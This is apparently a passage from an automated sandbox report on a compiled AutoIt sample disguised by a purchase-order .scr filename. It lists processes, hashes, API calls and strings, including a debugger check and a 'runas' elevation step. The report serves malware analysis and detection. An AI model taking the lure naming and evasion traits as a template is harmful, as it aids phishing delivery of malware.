Commandline:	C:\Windows\system32\AgentService.exe
Imagebase:	0x140000000
File size:	1'801'216 bytes
MD5 hash:	2BED1C40DED153B0705AD41485608E38
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	12:41:34
Start date:	20/10/2024
Path:	C:\Windows\System32\vds.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\vds.exe
Imagebase:	0x140000000
File size:	1'303'552 bytes
MD5 hash:	A5ACADA58AE262FF7A95C041CC61974E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	45
Start time:	12:41:36
Start date:	20/10/2024
Path:	C:\Windows\System32\wbengine.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\wbengine.exe"
Imagebase:	0x140000000
File size:	2'164'736 bytes
MD5 hash:	E47BE0CB009D27E2C029678B8A634B14
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	1.1%
Signature Coverage:	3%
Total number of Nodes:	1714
Total number of Limit Nodes:	44

Executed Functions

Function 00409A40 Relevance: 32.2, APIs: 15, Strings: 2, Instructions: 2432COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00409A61

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779

CharUpperBuffW.USER32(?,?), ref: 00409AF5

Strings

0vH, xrefs: 0042E5E9
4RH, xrefs: 0042D5BE

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
String ID: 0vH$4RH
API String ID: 1143807570-2085553193
Opcode ID: 99d1197353860daa2513f82cc2f46b4e9eeffbfa9250308b68df757a7373a6ee
Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
Opcode Fuzzy Hash: 99d1197353860daa2513f82cc2f46b4e9eeffbfa9250308b68df757a7373a6ee
Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B

Function 0040D6D0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 141
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5

Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF

IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763

Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483

SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe,00000004), ref: 0040D7D6
MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe,00000004), ref: 00431B0E
GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe,00000004), ref: 00431B3F
GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
ShellExecuteW.SHELL32(00000000), ref: 00431B92

Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6

Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E

Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7

Strings

@GH, xrefs: 00431B66
This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 00431AA4
@GH, xrefs: 00431B4C
runas, xrefs: 00431B86, 00431BB4
C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, xrefs: 0040D728, 0040D758, 0040D770, 00431B5A

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
String ID: @GH$@GH$C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
API String ID: 2493088469-991667753
Opcode ID: 1a0ed8742bd98226e3ba0f055742ccaca08136dd93b2b863f89549b94dfb798c
Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
Opcode Fuzzy Hash: 1a0ed8742bd98226e3ba0f055742ccaca08136dd93b2b863f89549b94dfb798c
Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E

Function 0040E470 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 165
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32 ref: 0040E495

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
FreeLibrary.KERNEL32(?), ref: 0040E5DE
FreeLibrary.KERNEL32(?), ref: 0040E5F2

Strings

pMH, xrefs: 0040E4C2

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
String ID: pMH
API String ID: 2923339712-2522892712
Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB

Function 0040EB70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D

Strings

uxtheme.dll, xrefs: 0040EB76
IsThemeActive, xrefs: 0040EB87

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: IsThemeActive$uxtheme.dll
API String ID: 2574300362-3542929980
Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28

Function 00410B90 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 167
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
__wsplitpath.LIBCMT ref: 00410C61

Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2

_wcsncat.LIBCMT ref: 00410C78
__wmakepath.LIBCMT ref: 00410C94

Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52

Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779

_wcscpy.LIBCMT ref: 00410CCC
RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
RegQueryValueExW.ADVAPI32 ref: 00429BE4
_wcscat.LIBCMT ref: 00429C43
_wcslen.LIBCMT ref: 00429C55
_wcslen.LIBCMT ref: 00429C66
_wcscat.LIBCMT ref: 00429C80
_wcsncpy.LIBCMT ref: 00429CC0
RegCloseKey.ADVAPI32(?), ref: 00429CDE

Strings

\, xrefs: 00429C6E
Include, xrefs: 00410C72, 00429BD6
Software\AutoIt v3\AutoIt, xrefs: 00410CDF

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
String ID: Include$Software\AutoIt v3\AutoIt$\
API String ID: 1004883554-2276155026
Opcode ID: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
Opcode Fuzzy Hash: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A

Function 004095C7 Relevance: 21.5, APIs: 14, Instructions: 539sleeptimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00409A40: _wcslen.LIBCMT ref: 00409A61
Part of subcall function 00409A40: CharUpperBuffW.USER32(?,?), ref: 00409AF5

Sleep.KERNEL32(0000000A), ref: 00409870
timeGetTime.WINMM ref: 00409880

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: BuffCharSleepTimeUpper_wcslentime
String ID:
API String ID: 3219444185-0
Opcode ID: b124ae733e2c30a8df030179fd7ebda2966fc041c6879d6beed06594e2dda547
Instruction ID: 79dfb759edd1749a95aa3438e3198289cebfc990e9c1b7da565b255c5aac8c6d
Opcode Fuzzy Hash: b124ae733e2c30a8df030179fd7ebda2966fc041c6879d6beed06594e2dda547
Instruction Fuzzy Hash: D422F171608342ABC724DF64C984BABB7A0BF89304F14492FE54997392D77CEC45CB9A

Function 004161C2 Relevance: 21.1, APIs: 14, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_fast_error_exit.LIBCMT ref: 0041620D
__mtinit.LIBCMT ref: 00416213
_fast_error_exit.LIBCMT ref: 0041621E
__RTC_Initialize.LIBCMT ref: 00416224
__ioinit.LIBCMT ref: 0041622C
__amsg_exit.LIBCMT ref: 00416237
GetCommandLineW.KERNEL32 ref: 0041623D
__wsetargv.LIBCMT ref: 00416251
__amsg_exit.LIBCMT ref: 0041625C
__wsetenvp.LIBCMT ref: 00416262
__amsg_exit.LIBCMT ref: 0041626D
__cinit.LIBCMT ref: 00416274
__amsg_exit.LIBCMT ref: 0041627F
__wwincmdln.LIBCMT ref: 00416285

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
String ID:
API String ID: 2477803136-0
Opcode ID: 5c6ad9204277a855c32b49e0d8ca3a5fd5782e976c2a5896ff1cb7bad4d5bdf3
Instruction ID: 5d71fe406d9f608d9de966b229f2038f561e79c4b175df4472a1e640f9164680
Opcode Fuzzy Hash: 5c6ad9204277a855c32b49e0d8ca3a5fd5782e976c2a5896ff1cb7bad4d5bdf3
Instruction Fuzzy Hash: 6A21A671D00315A9DB14BBB2A9467EE2664AF1074CF1144AFF9056A2D3EEBCC8C1461D

Function 004523CE Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__fread_nolock.LIBCMT ref: 004523ED
__fread_nolock.LIBCMT ref: 00452432
__fread_nolock.LIBCMT ref: 0045244F
_wcscpy.LIBCMT ref: 0045247D
__fread_nolock.LIBCMT ref: 0045248E
__fread_nolock.LIBCMT ref: 004524AB
_wcscpy.LIBCMT ref: 004524D9
_fseek.LIBCMT ref: 00452517
__fread_nolock.LIBCMT ref: 0045252B
_fseek.LIBCMT ref: 00452546

Strings

FILE, xrefs: 0045240A

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: __fread_nolock$_fseek_wcscpy
String ID: FILE
API String ID: 3888824918-3121273764
Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA

Function 004102F0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32 ref: 00410326
RegisterClassExW.USER32 ref: 00410359
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
LoadIconW.USER32(00400000,000000A9), ref: 004103B1
ImageList_ReplaceIcon.COMCTL32(0095E6B0,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1

Strings

AutoIt v3 GUI, xrefs: 00410349
0, xrefs: 00410302
TaskbarCreated, xrefs: 0041035F
+, xrefs: 0041030A

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A

Function 004101F0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 74
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 004101F9
LoadCursorW.USER32(00000000,00007F00), ref: 00410209
LoadIconW.USER32(?,00000063), ref: 0041021F
LoadIconW.USER32(?,000000A4), ref: 00410232
LoadIconW.USER32(?,000000A2), ref: 00410245
LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
RegisterClassExW.USER32 ref: 004102C6

Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(0095E6B0,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1

Strings

PGH, xrefs: 004102AE
#, xrefs: 00410292
0, xrefs: 0041028A

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$PGH
API String ID: 423443420-3673556320
Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99

Function 00452574 Relevance: 13.7, APIs: 9, Instructions: 171
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_fseek.LIBCMT ref: 004525DA

Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9

__fread_nolock.LIBCMT ref: 00452618
__fread_nolock.LIBCMT ref: 00452629
__fread_nolock.LIBCMT ref: 00452644
__fread_nolock.LIBCMT ref: 00452661
_fseek.LIBCMT ref: 0045267D
_malloc.LIBCMT ref: 00452689
_malloc.LIBCMT ref: 00452696
__fread_nolock.LIBCMT ref: 004526A7

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: __fread_nolock$_fseek_malloc_wcscpy
String ID:
API String ID: 1911931848-0
Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A

Function 0040F450 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strcat.LIBCMT ref: 0040F483
__fread_nolock.LIBCMT ref: 0040F4C6
_fseek.LIBCMT ref: 0040F517

Strings

EA06, xrefs: 004293A9
AU3!, xrefs: 0040F47D

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: __fread_nolock_fseek_strcat
String ID: AU3!$EA06
API String ID: 3818483258-2658333250
Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
